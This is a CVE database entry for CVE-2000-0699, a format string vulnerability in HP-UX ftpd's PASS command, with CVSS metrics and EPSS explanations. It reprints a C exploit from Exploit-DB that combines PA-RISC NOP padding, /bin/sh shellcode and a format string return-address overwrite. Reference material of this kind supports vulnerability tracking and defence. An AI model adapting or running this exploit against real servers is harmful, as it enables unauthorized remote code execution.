CVE-2000-0699 : Detail

CVE-2000-0699

2.06%V3
Network
2002-03-09
04h00 +00:00
2002-02-21
23h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Format string vulnerability in ftpd in HP-UX 10.20 allows remote attackers to cause a denial of service or execute arbitrary commands via format strings in the PASS command.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 212

Publication date : 2000-11-30 23h00 +00:00
Author : venglin
EDB Verified : Yes

/* theoretical exploit for hpux ftpd vulnerability */ /* not tested anywhere, needs tweaking */ /* (c) 2000 by babcia padlina ltd. <[email protected]> */ #include <stdio.h> #include <stdlib.h> #define NOPS 100 #define BUFSIZE 1024 char shellcode[] = /* HP-UX shellcode */ "\x34\x16\x05\x06\x96\xd6\x05\x34\x20\x20\x08\x01\xe4\x20\xe0\x08\x0b" "\x5a\x02\x9a\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41" "\x04\x02\x60\x40\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02" "\x98\x34\x16\x04\xbe\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34" "\xde\xad\xca\xfe\x2f\x62\x69\x6e\x2f\x73\x68"; char nop[] = "\x08\x21\x02\x80"; /* PA-RISC NOP */ unsigned long ret = 0xdeadbeef; int main(argc, argv) int argc; char **argv; { int stackofs; char buf[BUFSIZ*2]; int i; for (strcpy(buf, "PASS "),i=0;i<NOPS;i++) strcat(buf, nop); sprintf(buf+strlen(buf), "%s%%.%dd%c%c%c%c", shellcode, BUFSIZE-strlen(shellcode)-NOPS*4-4, ((int)ret & 0xff), (((int)ret & 0xff00) >> 8), (((int)ret & 0xff0000) >> 16), (((int)ret & 0xff000000) >> 24)); printf("USER ftp\r\n%s\r\n", buf); exit(0); } // milw0rm.com [2000-12-01]

Products Mentioned

Configuraton 0

Hp>>Hp-ux >> Version 10.20

Hp>>Hp-ux >> Version 11.00

References

http://www.securityfocus.com/bid/1560
Tags : vdb-entry, x_refsource_BID